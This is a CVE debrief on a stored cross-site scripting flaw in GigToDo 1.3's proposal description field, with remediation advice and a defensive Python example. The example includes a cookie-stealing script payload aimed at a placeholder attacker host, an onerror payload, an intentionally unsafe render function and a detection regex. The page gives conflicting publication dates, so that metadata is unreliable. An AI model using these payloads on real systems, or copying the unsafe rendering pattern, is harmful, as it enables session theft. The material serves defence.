PatchSiren cyber security CVE debrief
CVE-2019-25739 Gigtodoscript CVE debrief
CVE-2019-25739 is a medium-severity stored (persistent) cross-site scripting vulnerability in GigToDo 1.3, a freelance marketplace script. An authenticated user can place JavaScript or HTML in the proposal description field submitted to the create_proposal endpoint; the payload is stored with the proposal and executes in the browser of any administrator or other user who later views it, which is enough for session-cookie theft and forced redirects to attacker-controlled pages.
- Vendor: Gigtodoscript
- Product: GigToDo
- CVSS: MEDIUM 5.1
- CISA KEV: Not listed in stored evidence
- Original CVE published: 2026-06-04
- Original CVE updated: 2026-06-10
- Advisory published: 2026-06-04
- Advisory updated: 2026-06-10
Who should care
Administrators and users of GigToDo 1.3, as well as developers and security teams responsible for maintaining and securing instances of the script.
Technical summary
GigToDo 1.3 accepts the proposal description sent to create_proposal without neutralising markup and renders it without output encoding, so script or HTML placed in that field is persisted server-side and runs in the browser of every user, administrators included, who opens the proposal. Exploitation needs only a low-privilege account (any user able to submit a proposal) plus a victim viewing the stored proposal; the CVSS score of 5.1 (MEDIUM) reflects that authentication and user interaction are both required, while the impact grows with the privilege of whoever views the proposal.
Defensive priority
High
Recommended defensive actions
- Apply any vendor patch or update for GigToDo 1.3 that fixes the persistent cross-site scripting in the proposal description field.
- Validate the proposal description on input and, more importantly, HTML-encode it at every point where it is rendered; input validation alone does not stop stored XSS. Also sweep descriptions already in the database, because payloads submitted before the fix remain stored and keep firing.
- Use a web application firewall (WAF) to detect and block requests to create_proposal carrying script tags, event-handler attributes or javascript: URLs; treat this as a stop-gap, not a fix.
- Mark the session cookie HttpOnly, Secure and SameSite so that a script which does execute cannot read it from document.cookie, and educate administrators and users to treat unexpected redirects or prompts when viewing proposals as suspicious.
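The rendering and clean-up steps above, as an added example that is not GigToDo's own code: a vulnerable render that concatenates the stored description into HTML, its hardened counterpart using contextual output encoding, a heuristic sweep for proposals that already carry injected markup, and a hardened session-cookie header. The proposal rows, field names and the attacker hostname are constructed for the example; the page gives only the field (proposal description) and the endpoint (create_proposal).

```python
"""Stored-XSS hardening for a proposal-description field (added example)."""
import html
import re

# Constructed sample rows, standing in for what a "proposals" table might hold
# after the bug has been exploited. Row 2 mimics a cookie-exfiltration payload,
# row 3 an event-handler payload; row 1 is a benign, plain-text proposal.
SAMPLE_PROPOSALS = [
    {"id": 1, "author": "alice",
     "description": "I can deliver this in 3 days for $200."},
    {"id": 2, "author": "mallory",
     "description": '<script>document.location="https://attacker.example/?c="'
                    '+document.cookie</script>'},
    {"id": 3, "author": "mallory",
     "description": '<img src=x onerror="alert(document.cookie)">'},
]


def render_proposal_unsafe(proposal: dict) -> str:
    """Vulnerable pattern: untrusted text is concatenated straight into HTML,
    so stored markup becomes live markup for every viewer."""
    return f'<div class="proposal">{proposal["description"]}</div>'


def render_proposal_safe(proposal: dict) -> str:
    """Hardened pattern: encode for the HTML text-node context at output time.
    quote=True also encodes " and ', so the same helper is safe to reuse when
    the value lands inside an attribute."""
    encoded = html.escape(proposal["description"], quote=True)
    return f'<div class="proposal">{encoded}</div>'


# Tokens worth flagging when sweeping data already exposed to the bug. A
# proposal description is expected to be plain text, so any hit is review-worthy.
# This is a triage heuristic, not a sanitiser: encoding on output is the fix.
SUSPICIOUS = re.compile(
    r"<\s*script\b|<\s*iframe\b|\bon[a-z]+\s*=|javascript\s*:|document\.cookie",
    re.IGNORECASE,
)


def find_suspicious_descriptions(proposals) -> list[int]:
    """Return the ids of proposals whose stored description contains
    script-like tokens, for manual review and removal."""
    return [p["id"] for p in proposals if SUSPICIOUS.search(p["description"])]


def session_cookie_header(name: str, value: str) -> str:
    """Defence in depth against the cookie-theft outcome: HttpOnly keeps the
    session cookie out of document.cookie even if a payload does execute.
    The cookie name is an assumption; use whatever the application issues."""
    return f"{name}={value}; Path=/; Secure; HttpOnly; SameSite=Lax"


if __name__ == "__main__":
    for p in SAMPLE_PROPOSALS:
        print(render_proposal_safe(p))
    print("needs review:", find_suspicious_descriptions(SAMPLE_PROPOSALS))
    print(session_cookie_header("session", "opaque-token"))
```

The encoded output still shows the attacker's text verbatim to a reviewer, which is what you want during clean-up: the markup is visible but inert. If the product later needs rich text in descriptions, replace the blanket encoding with an allow-list HTML sanitiser rather than a deny-list regex like the sweep above.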
Evidence notes
The CVE record was obtained from the official CVE website [cve-org]. Additional details were taken from the National Vulnerability Database [nvd] and the further references [ref-4], [ref-5], [ref-6] and [ref-7].
Official resources
CVE-2019-25739 was published on 2019-04-09T00:00:00.000Z and modified on 2019-04-09T00:00:00.000Z.